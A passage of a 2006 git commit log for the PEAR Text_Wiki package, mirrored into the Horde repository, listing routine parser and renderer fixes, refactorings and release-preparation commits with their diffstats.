    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206950 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Image.php     | 10 +++++-----
 Text/Wiki/Render/Docbook/Phplookup.php |  2 +-
 Text/Wiki/Render/Docbook/Smiley.php    |  2 +-
 Text/Wiki/Render/Docbook/Url.php       |  8 ++++----
 Text/Wiki/Render/Docbook/Wikilink.php  |  2 +-
 Text/Wiki/Render/Doku/Function.php     | 16 ++++++++--------
 Text/Wiki/Render/Latex/Wikilink.php    |  6 +++---
 Text/Wiki/Render/Tiki/Function.php     | 16 ++++++++--------
 8 files changed, 31 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/e8f6a98454443d4ee406c4e0833fa5d334e5f44d

-----------------------------------------------------------------------

commit b879da30220e91a68e4d79609085a527ba1f3e25
Author: bertrand Gugger 
Date:   Wed Feb 15 06:04:03 2006 +0000

    It's not Bold produced by Emphasis, but Strong, and only by rendering:
    Emphasis inserts a fake rule 'Strong' (null) just to get the render obj created
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207177 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                | 4 ++--
 Text/Wiki/Parse/Mediawiki/Emphasis.php | 9 +++++++++
 2 files changed, 11 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/b879da30220e91a68e4d79609085a527ba1f3e25

-----------------------------------------------------------------------

commit 5ce1f0d0c2b3d86d9223e7c18c865c164856f0c8
Author: bertrand Gugger 
Date:   Wed Feb 15 07:20:17 2006 +0000

    The overwrite of getTokens() method is no more needed since rev. 1.31 of Wiki.php
    Comment out render pathes extension, merge with tikiwiki repository is still TODO !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207180 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Tiki.php | 22 +---------------------
 1 file changed, 1 insertion(+), 21 deletions(-)

http://github.com/horde/horde/commit/5ce1f0d0c2b3d86d9223e7c18c865c164856f0c8

-----------------------------------------------------------------------

commit e114abbc2e7b557d59b2aa8c7dbcffa574aa33a3
Author: bertrand Gugger 
Date:   Wed Feb 15 07:27:53 2006 +0000

    The overwrite of getTokens() was not needed and even dangerous ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207181 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 20 --------------------
 1 file changed, 20 deletions(-)

http://github.com/horde/horde/commit/e114abbc2e7b557d59b2aa8c7dbcffa574aa33a3

-----------------------------------------------------------------------

commit 568c4ec9c2fe057d4c3015b743a277f6da30a1ff
Author: bertrand Gugger 
Date:   Wed Feb 15 08:42:02 2006 +0000

    Correct the key used in changeRule(), ensure no double new rule.
    However, I'm still wondering what's the goal in it, overwriting the rule's
    parse and render methods should be the right way ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207184 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/568c4ec9c2fe057d4c3015b743a277f6da30a1ff

-----------------------------------------------------------------------

commit 3a532d7cb5a1410778b58e33b7671067868ac8dc
Author: bertrand Gugger 
Date:   Wed Feb 15 10:20:08 2006 +0000

     ...  may be multiline
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207185 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Raw.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/3a532d7cb5a1410778b58e33b7671067868ac8dc

-----------------------------------------------------------------------

commit a9596cf9f01ab45d232f53ad679f449cceceef9b
Author: bertrand Gugger 
Date:   Wed Feb 15 11:34:01 2006 +0000

    The Jaws guys said we eat too much memory :( Load render objects only if needed :)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207196 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/a9596cf9f01ab45d232f53ad679f449cceceef9b

-----------------------------------------------------------------------

commit 656fd0c7d045b383068404172420d59b69639d6a
Author: bertrand Gugger 
Date:   Wed Feb 15 12:04:50 2006 +0000

    Base Wiki extensions were forgotten for Cowiki and Doku parsers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207200 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Cowiki.php | 43 +++++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Doku.php   | 43 +++++++++++++++++++++++++++++++++++++++++++
 packageCowiki.xml    |  3 ++-
 packageDoku.xml      |  3 ++-
 4 files changed, 90 insertions(+), 2 deletions(-)
 create mode 100644 Text/Wiki/Cowiki.php
 create mode 100644 Text/Wiki/Doku.php

http://github.com/horde/horde/commit/656fd0c7d045b383068404172420d59b69639d6a

-----------------------------------------------------------------------

commit 874cc0feaf74a36d10682f2c74c2a76558baa2c9
Author: bertrand Gugger 
Date:   Wed Feb 15 12:27:40 2006 +0000

    No more need to fake a Strong parsing rule since Render loads dinamically
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207202 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Emphasis.php | 10 ----------
 1 file changed, 10 deletions(-)

http://github.com/horde/horde/commit/874cc0feaf74a36d10682f2c74c2a76558baa2c9

-----------------------------------------------------------------------

commit c6216e9b2690a4c7b00f01e424f4f38e5764af6f
Author: bertrand Gugger 
Date:   Fri Feb 17 05:42:55 2006 +0000

    Prefer rawurlencode() to urlencode() to get %20 and not + for spaces
    (e.g. ftp compatibility)
    Corrected the comments: for now, it can treat only url chunks
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207313 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c6216e9b2690a4c7b00f01e424f4f38e5764af6f

-----------------------------------------------------------------------

commit 8f17da40d1e0d7f1dc6c9fdc9126bafc8d193216
Author: Del Elson 
Date:   Tue Feb 21 08:10:59 2006 +0000

    Whitespace changes only.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207653 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 69 ++++++++++++++++++++--------------------
 1 file changed, 34 insertions(+), 35 deletions(-)

http://github.com/horde/horde/commit/8f17da40d1e0d7f1dc6c9fdc9126bafc8d193216

-----------------------------------------------------------------------

commit 11f5be570411646db7f2e16d757c17463c79646d
Author: Del Elson 
Date:   Tue Feb 21 08:29:49 2006 +0000

    Change to allow code type="parsed"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207654 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 78 +++++++++++++++++++++++++++++++++++++---
 1 file changed, 73 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/11f5be570411646db7f2e16d757c17463c79646d

-----------------------------------------------------------------------

commit d85a0c3b0a2d21be294f9dff62f1f333c8561465
Author: bertrand Gugger 
Date:   Tue Feb 21 14:33:53 2006 +0000

    ROLLBACK
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207661 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 145 +++++++++++----------------------------
 1 file changed, 39 insertions(+), 106 deletions(-)

http://github.com/horde/horde/commit/d85a0c3b0a2d21be294f9dff62f1f333c8561465

-----------------------------------------------------------------------

commit fe1ae09da7898c115688c6a5b4996c77cba1e626
Author: bertrand Gugger 
Date:   Tue Feb 21 22:47:53 2006 +0000

    Cut out "?>" php tails, preg_replace('#\?>\s*\Z#ms', '', $script);
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207714 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Blockquote.php  | 1 -
 Text/Wiki/Parse/BBCode/Bold.php        | 1 -
 Text/Wiki/Parse/BBCode/Code.php        | 1 -
 Text/Wiki/Parse/BBCode/Colortext.php   | 1 -
 Text/Wiki/Parse/BBCode/Font.php        | 1 -
 Text/Wiki/Parse/BBCode/Image.php       | 1 -
 Text/Wiki/Parse/BBCode/Italic.php      | 1 -
 Text/Wiki/Parse/BBCode/List.php        | 1 -
 Text/Wiki/Parse/BBCode/Subscript.php   | 1 -
 Text/Wiki/Parse/BBCode/Superscript.php | 1 -
 Text/Wiki/Parse/BBCode/Underline.php   | 1 -
 Text/Wiki/Parse/BBCode/Url.php         | 1 -
 12 files changed, 12 deletions(-)

http://github.com/horde/horde/commit/fe1ae09da7898c115688c6a5b4996c77cba1e626

-----------------------------------------------------------------------

commit 1a9e08fe7751ce64d78a302bd921eb04db2c9e7a
Author: bertrand Gugger 
Date:   Fri Feb 24 07:30:58 2006 +0000

    Cut php tail "?>"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207855 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 1 -
 1 file changed, 1 deletion(-)

http://github.com/horde/horde/commit/1a9e08fe7751ce64d78a302bd921eb04db2c9e7a

-----------------------------------------------------------------------

commit 32ecb7e33c1cc6cb52375221221d8c8c85654920
Author: bertrand Gugger 
Date:   Fri Feb 24 12:52:00 2006 +0000

    Wikilink also process Image and Interwiki (empty for now)
    Prefixes parsing for autolink, interlangage and interwiki
    Target triming and option to trensform spaces in underscore
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207875 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 197 ++++++++++++++++++++++++++++++---
 1 file changed, 184 insertions(+), 13 deletions(-)

http://github.com/horde/horde/commit/32ecb7e33c1cc6cb52375221221d8c8c85654920

-----------------------------------------------------------------------

commit a6535cf30894b478684558bbedefd2ef3bfa866e
Author: bertrand Gugger 
Date:   Sat Feb 25 04:19:55 2006 +0000

    Correct the prefixes handling
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207912 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/a6535cf30894b478684558bbedefd2ef3bfa866e

-----------------------------------------------------------------------

commit 544b414c7e350265a8f63b06a446754ad8b07625
Author: bertrand Gugger 
Date:   Sat Feb 25 05:03:13 2006 +0000

    Allow parsers to give the full url in token options instead of the site + wiki page
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207914 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Interwiki.php | 39 ++++++++++++++++++++----------------
 1 file changed, 22 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/544b414c7e350265a8f63b06a446754ad8b07625

-----------------------------------------------------------------------

commit 6a4645bf0a5aaac7a511ead548761cb2f9a4e143
Author: bertrand Gugger 
Date:   Sat Feb 25 05:10:10 2006 +0000

    Allow parsers to give the full url in token options instead of the site + wiki page
    Urlencode the page name
    Removed unused configuration option 'target'
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207915 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Interwiki.php | 50 +++++++++++++++++-------------------
 1 file changed, 24 insertions(+), 26 deletions(-)

http://github.com/horde/horde/commit/6a4645bf0a5aaac7a511ead548761cb2f9a4e143

-----------------------------------------------------------------------

commit 4ef6bac11d20ca32f04c890f994ace62aa885d77
Author: bertrand Gugger 
Date:   Sat Feb 25 05:16:54 2006 +0000

    Complete the rendering with indication of (url) or (site:page)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207916 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Plain/Interwiki.php | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/4ef6bac11d20ca32f04c890f994ace62aa885d77

-----------------------------------------------------------------------

commit f38c0b85015c95fe5f19e76cf5ca5bd1ecc400ba
Author: bertrand Gugger 
Date:   Sat Feb 25 05:20:51 2006 +0000

    Allow parsers to give the full url in token options instead of the site + wiki page
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207917 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Interwiki.php | 36 ++++++++++++++++++++--------------
 1 file changed, 21 insertions(+), 15 deletions(-)

http://github.com/horde/horde/commit/f38c0b85015c95fe5f19e76cf5ca5bd1ecc400ba

-----------------------------------------------------------------------

commit e9e5f9c63da843e9ffff216bca2b828e528a977d
Author: bertrand Gugger 
Date:   Sat Feb 25 07:47:57 2006 +0000

    Process interlangage only as an Interwiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207925 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/e9e5f9c63da843e9ffff216bca2b828e528a977d

-----------------------------------------------------------------------

commit c8f08d334c6a52dc2e9154bbdd528154402da25b
Author: bertrand Gugger 
Date:   Sat Feb 25 10:00:04 2006 +0000

    Image and Interwiki are now done by the Wikilink rule
    Corrected, Wikilink and its regexp, extended to produce Image and Interwiki
    These 2 rules don't exist anymore as independant class but are still configurable/switchable
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207939 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                 |   4 +-
 Text/Wiki/Parse/Mediawiki/Image.php     | 192 --------------------------------
 Text/Wiki/Parse/Mediawiki/Interwiki.php | 162 ---------------------------
 Text/Wiki/Parse/Mediawiki/Wikilink.php  |  48 +++++---
 4 files changed, 36 insertions(+), 370 deletions(-)
 delete mode 100644 Text/Wiki/Parse/Mediawiki/Image.php
 delete mode 100644 Text/Wiki/Parse/Mediawiki/Interwiki.php

http://github.com/horde/horde/commit/c8f08d334c6a52dc2e9154bbdd528154402da25b

-----------------------------------------------------------------------

commit 07850fd2c5b26411f39c0c2a7ec4c81f13851288
Author: bertrand Gugger 
Date:   Sat Feb 25 13:34:50 2006 +0000

    Take align attribute (left, center, or right) as piped after the | in image tag
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 207947 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 24 ++++++++++++++++++++++--
 1 file changed, 22 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/07850fd2c5b26411f39c0c2a7ec4c81f13851288

-----------------------------------------------------------------------

commit 424a631d33282ff481d1e3f70e624aca68173eb1
Author: Del Elson 
Date:   Mon Feb 27 01:20:36 2006 +0000

    Reversed order of parameters in singleton.
    Corrected grammar and expanded comments in singleton.
    Changed require_once to include_once for the parser to prevent it borking at compile time.
    Fixed spacing to comply with PEAR CS.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208058 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 64 +++++++++++++++++++++++++++++++++++++----------------------
 1 file changed, 40 insertions(+), 24 deletions(-)

http://github.com/horde/horde/commit/424a631d33282ff481d1e3f70e624aca68173eb1

-----------------------------------------------------------------------

commit 9662c45bddd17a1921fd69b6f7b2c48b8be944a6
Author: Del Elson 
Date:   Mon Feb 27 09:19:50 2006 +0000

    Fix for new parameter order in singleton.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208076 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/9662c45bddd17a1921fd69b6f7b2c48b8be944a6

-----------------------------------------------------------------------

commit c2e38fbee9fc685fa5ce89be4d1a55575b996119
Author: Del Elson 
Date:   Mon Feb 27 10:33:51 2006 +0000

    Fix for non-default instantiations of the constructor.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208085 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 28 +++++++++++++++++++++++++---
 doc/test_Text_Wiki.php | 11 +++++++++++
 2 files changed, 36 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/c2e38fbee9fc685fa5ce89be4d1a55575b996119

-----------------------------------------------------------------------

commit faf7a70fb7b3ef02e236b6d5425ca5a647451143
Author: Justin Patrin 
Date:   Mon Feb 27 17:02:12 2006 +0000

    Fix undefined offset error
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208109 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Interwiki.php | 114 ++++++++++++++++++-------------------
 1 file changed, 57 insertions(+), 57 deletions(-)

http://github.com/horde/horde/commit/faf7a70fb7b3ef02e236b6d5425ca5a647451143

-----------------------------------------------------------------------

commit 06bcdd15653ec571c9475a25dbacff6a53cc4b9a
Author: Justin Patrin 
Date:   Mon Feb 27 17:02:32 2006 +0000

    Fix undefined offset errors
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208110 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Wikilink.php | 120 +++++++++++++++++++-------------------
 1 file changed, 60 insertions(+), 60 deletions(-)

http://github.com/horde/horde/commit/06bcdd15653ec571c9475a25dbacff6a53cc4b9a

-----------------------------------------------------------------------

commit bfff989bcdc79aa068b7d1c149f2f1ffae61113e
Author: Justin Patrin 
Date:   Mon Feb 27 17:03:11 2006 +0000

    Fix undefined variable notice
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208111 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Table.php | 141 +++++++++++++++++++++--------------------
 1 file changed, 71 insertions(+), 70 deletions(-)

http://github.com/horde/horde/commit/bfff989bcdc79aa068b7d1c149f2f1ffae61113e

-----------------------------------------------------------------------

commit b86d69ae0d7640cceed8b17d768c733976110d5e
Author: Justin Patrin 
Date:   Mon Feb 27 17:25:59 2006 +0000

    Fix setting of anchor, fix output of links (new link code has not been merged to mainline yet....)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208113 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Wikilink.php | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/b86d69ae0d7640cceed8b17d768c733976110d5e

-----------------------------------------------------------------------

commit 09402ab1445db93809e51c89dcdd1461f9ee2a80
Author: Justin Patrin 
Date:   Mon Feb 27 17:27:50 2006 +0000

    add missing return
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208114 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/09402ab1445db93809e51c89dcdd1461f9ee2a80

-----------------------------------------------------------------------

commit 5c8cc679d8d79e5aed7415ea479ccf36c748b9c3
Author: bertrand Gugger 
Date:   Mon Feb 27 19:10:27 2006 +0000

    Start release preparation
    Introduce Del as developer so he will not be put out by the release itself
    Fixed number to 1.1.0 , we cannot use 1.0.4 anyway
    Prepare a free place for logs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208123 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 22 ++++++++++++++++++----
 1 file changed, 18 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/5c8cc679d8d79e5aed7415ea479ccf36c748b9c3

-----------------------------------------------------------------------

commit 3c3a1c09f057ad9674e05cf2ed241bf468dea477
Author: bertrand Gugger 
Date:   Mon Feb 27 19:42:36 2006 +0000

    Put bases for the release, more details to come, release is not ready
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208126 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/3c3a1c09f057ad9674e05cf2ed241bf468dea477

-----------------------------------------------------------------------

commit d6c51f8e86f02d64a85894b0c85b757757e4128c
Author: bertrand Gugger 
Date:   Mon Feb 27 20:40:49 2006 +0000

    That should be all for now. Expected release is 1st of March.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208129 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 17 ++++++++++++++---
 1 file changed, 14 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/d6c51f8e86f02d64a85894b0c85b757757e4128c

-----------------------------------------------------------------------

commit f9f0b5c6195b2144257544bb8206a96784898093
Author: Justin Patrin 
Date:   Tue Feb 28 01:55:09 2006 +0000

    Put back new style links for Doku wikilink
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208154 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Wikilink.php | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/f9f0b5c6195b2144257544bb8206a96784898093

-----------------------------------------------------------------------

commit 132b33c5756d74aed4cf0a6e1b7c9cf9c8febf5b
Author: Justin Patrin 
Date:   Tue Feb 28 02:06:18 2006 +0000

    Add support for wikilinks which are split into start and end tokens around link text
    - This is needed for proper conversion of one syntax into another and allows for formatting within a link's text
    - Note: old style still works and is still used in the Default parser, newer parsers should use the new type
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208157 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 28 ++++++++++++++++++++++++----
 1 file changed, 24 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/132b33c5756d74aed4cf0a6e1b7c9cf9c8febf5b

-----------------------------------------------------------------------

commit 1b4782d7d956b1ee73b9b89c7b08ede5f83d9e00
Author: Justin Patrin 
Date:   Tue Feb 28 02:25:13 2006 +0000

    Deak with the case where the text is empty
    - This allows the parser to not set text when there is no text given for a page
    -- and thus allows *really* proper wikilink rendering in other dialects
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208161 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 3 +++
 1 file changed, 3 insertions(+)

http://github.com/horde/horde/commit/1b4782d7d956b1ee73b9b89c7b08ede5f83d9e00

-----------------------------------------------------------------------

commit bb1115b479d7e10436f5796f8c4ad5996400bf02
Author: Justin Patrin 
Date:   Tue Feb 28 02:26:29 2006 +0000

    Fix undefined offset notices in Cowiki parser's Wikilink and Interwiki rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208162 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Interwiki.php | 10 +++++++---
 Text/Wiki/Parse/Cowiki/Wikilink.php  |  7 +++++--
 2 files changed, 12 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/bb1115b479d7e10436f5796f8c4ad5996400bf02

-----------------------------------------------------------------------

commit f23f480c5a807847c5c682f14af186c6a7cf5015
Author: Justin Patrin 
Date:   Tue Feb 28 02:40:11 2006 +0000

    Re-add code to not set 'text' if no explicit text is given
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208163 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Doku/Wikilink.php | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

http://github.com/horde/horde/commit/f23f480c5a807847c5c682f14af186c6a7cf5015

-----------------------------------------------------------------------

commit de1dc1eb0147e46a636bd00d4d898a4be3308d4a
Author: Justin Patrin 
Date:   Tue Feb 28 03:15:09 2006 +0000

    When text option is empty, use page which is not urlEncoded and textEncode it
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208166 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/de1dc1eb0147e46a636bd00d4d898a4be3308d4a

-----------------------------------------------------------------------

commit cd60e0878b44c430967d982b901480072c4b146a
Author: bertrand Gugger 
Date:   Tue Feb 28 05:08:29 2006 +0000

    Change misleading method name
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208175 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 12 ++++++------
 doc/test_Text_Wiki.php |  6 +++---
 2 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/cd60e0878b44c430967d982b901480072c4b146a

-----------------------------------------------------------------------

commit 41015524a28c507bdf0c361f74f0f7b7d711f678
Author: Justin Patrin 
Date:   Wed Mar 1 15:43:21 2006 +0000

    Revert rename of singleton
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208353 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 12 ++++++------
 doc/test_Text_Wiki.php |  6 +++---
 2 files changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/41015524a28c507bdf0c361f74f0f7b7d711f678

-----------------------------------------------------------------------

commit 8b69405be236ee6fc9c3be172fa3d28bdcb097cc
Author: Justin Patrin 
Date:   Wed Mar 1 16:33:05 2006 +0000

    Replace preg_replace with str_replace, fix variable names
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208361 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Cowiki.php | 4 ++--
 Text/Wiki/Doku.php   | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/8b69405be236ee6fc9c3be172fa3d28bdcb097cc

-----------------------------------------------------------------------

commit 23a0b791a3f5787fbfb88ed8d5278745e8d6e9bc
Author: Justin Patrin 
Date:   Wed Mar 1 16:58:17 2006 +0000

    Revert changes to constructor as it cannot instantiate the parser class as it should
    Reverse parameter order to singleton() as it no longer matches the constructor and $parser it the mor eimportant parameter
    Add a factory() method to complement singleton()
    Update factory()/singleton() to return/handle errors
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208363 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 80 +++++++++++++++++++++++++++-----------------------
 Text/Wiki/Default.php  | 27 +++++++++++++++++
 doc/test_Text_Wiki.php | 17 +++++------
 package.xml            | 31 ++++++++++++-------
 4 files changed, 100 insertions(+), 55 deletions(-)
 create mode 100644 Text/Wiki/Default.php

http://github.com/horde/horde/commit/23a0b791a3f5787fbfb88ed8d5278745e8d6e9bc

-----------------------------------------------------------------------

commit ad0cf013208f2e451346d069b9347689b038ed53
Author: bertrand Gugger 
Date:   Wed Mar 1 18:48:45 2006 +0000

    Reordered the changes, factory() introduced
    Default has now its own implementation, added Text/Wiki/Default.php
    Justin is now lead
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208381 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/ad0cf013208f2e451346d069b9347689b038ed53

-----------------------------------------------------------------------

commit f6323cc3e92d6c39d767418122502798c39705b5
Author: bertrand Gugger 
Date:   Wed Mar 1 23:06:34 2006 +0000

    Push release 1 day
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208395 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f6323cc3e92d6c39d767418122502798c39705b5

-----------------------------------------------------------------------

commit ef6488957a742b3528860e83c3b79c9be69c27e1
Author: Justin Patrin 
Date:   Thu Mar 2 01:55:27 2006 +0000

    Alter factory to check to make sure the file is readable before including it
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208422 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 30 ++++++++++++++++++------------
 1 file changed, 18 insertions(+), 12 deletions(-)

http://github.com/horde/horde/commit/ef6488957a742b3528860e83c3b79c9be69c27e1

-----------------------------------------------------------------------

commit 479350d36e7cef3e82ac6d316d35b179f619662b
Author: Justin Patrin 
Date:   Thu Mar 2 04:04:59 2006 +0000

    Check in factory using @fopen($file, 'r', true) instead of looping over include_path
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 208432 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

